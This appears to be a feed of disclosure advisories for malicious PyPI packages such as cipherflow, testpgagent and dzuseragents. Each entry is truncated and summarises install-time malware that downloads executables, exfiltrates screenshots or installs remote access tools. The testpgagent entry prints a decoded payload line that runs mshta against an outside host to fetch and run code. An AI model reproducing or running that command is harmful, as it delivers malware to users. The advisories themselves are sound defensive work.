Malicious code in temp-development-package-test (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 5cdc1d94dd0cfb62a4a0267ae52bf1a72dfa31a6854196b4bb220759b7c6e878 Starting with version 0.4, package installs a sitecustomize.py that executes during Python engine initialization. The embeded code uses mshta to download...

MAL-2026-5839 Malicious code in cipherflow (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 281ede3c5b3181c2df22a4b32a01453a51ac389a1dfe8bde69d53821cbaf20d4 cipherflow advertises itself as a zero-dependency pure-Python AES/DES library, but cipherflow/environ.py contains a multi-layer-obfuscated payload th...

Malicious code in testpgagent (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls execbase64.b64decode... whose decoded body is import os; os.system'cmd /c "mshta http://fixars.top"'. This...

MAL-2026-4835 Malicious code in rogiant-install (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 0c659d6e1e7b9bbbbb7b808196db4231a5eb1a62fe91827fc02fd708b92728b5 During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...

MAL-2026-4810 Malicious code in binproto (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 72de81f36a15d75d302ca94b378c3e5025b6d0cb2d24360d06527130ed053ebd When using the provided functionality, the code silently downloads and executes a malicious executable. --- Category: MALICIOUS - The campaign has clearly...

Malicious code in robase-fast-install (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 eb36bd6222d998fae305e6200dff6413fec375765d7b81876e8041b72101c7ef During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...

Malicious code in databasetapes (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 d859d21aa59dfad2efc5c2f98253cd1cc808621fb3b7525037c104324e27dfe8 During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...

MAL-2026-927 Malicious code in polyclawd (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 1f994af0e1b17c0d30e950a5aef9a45d8e34f6f59ab45fadddb05b340ed5cdad The package is prepared to download a hardcoded executable and save it in %LOCALAPPDATA% under a very generic name, clearly aiming to hide its existence. Code ...

MAL-2026-909 Malicious code in clawdist (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 3008887b6c2929530cd48dc996c91d70eb92432465d02f4ff28e6d5927350097 The package is prepared to download a hardcoded executable and save it in %LOCALAPPDATA% under a very generic name, clearly aiming to hide its existence. Code ...

Malicious code in dzuseragents (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 f0be670ad8e17f42129943a744559ebb8818c581bc637c1469cf8553b7b8f8c9 The package downloads an executable and adds it to autostart. The downloaded application then periodically creates a screenshot and sends it to a Discord...

MAL-2026-899 Malicious code in dzuseragents (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 f0be670ad8e17f42129943a744559ebb8818c581bc637c1469cf8553b7b8f8c9 The package downloads an executable and adds it to autostart. The downloaded application then periodically creates a screenshot and sends it to a Discord...

Malicious code in magichat (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 b999f3f5762dc9bcb0dc2e91ef10116a368aca535d2f07fa2519e8d64bbc0902 The package is prepared to download a hardcoded executable and save it in %LOCALAPPDATA% under a very generic name, clearly aiming to hide its existence. Code ...

MAL-2026-843 Malicious code in requests-core-plugin (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 f7d809caa4cb4961377b3c02a06f90ce19136a36297191248a8c6cd289a809f2 During installation, package loads obfuscated code that then downloads and starts an executable. The final executable is identified as malware and appears to...

Malicious code in saintone (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 d762a42d55901a472c7070197cef989428ecb0140acfe02c72d719d74b430436 Code downloads and starts an executable widely recognized as malware, then sends some results to a Telegram webhook. --- Category: MALICIOUS - The campaign has...

MAL-2025-191862 Malicious code in saintone (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 d762a42d55901a472c7070197cef989428ecb0140acfe02c72d719d74b430436 Code downloads and starts an executable widely recognized as malware, then sends some results to a Telegram webhook. --- Category: MALICIOUS - The campaign has...

Malicious code in selenium-stealth-utils (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 b7721bb039c55a43bd1dc81dfad14494df158912f9dda006a67881ce54be64d3 During importing, a malicious executable is being downloaded and started. According to sandbox report, the executable is an infostealer of rhadamanthys family...

Malicious code in svcmanager (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 062d589e7c49394864a13694f3de2a89589fd2f5e6a4d2e43e35ce136b6e7e9c Package attempts to download an executable and install it as a privileged service. The executable seems to be modified remote access tool --- Category: MALICIO...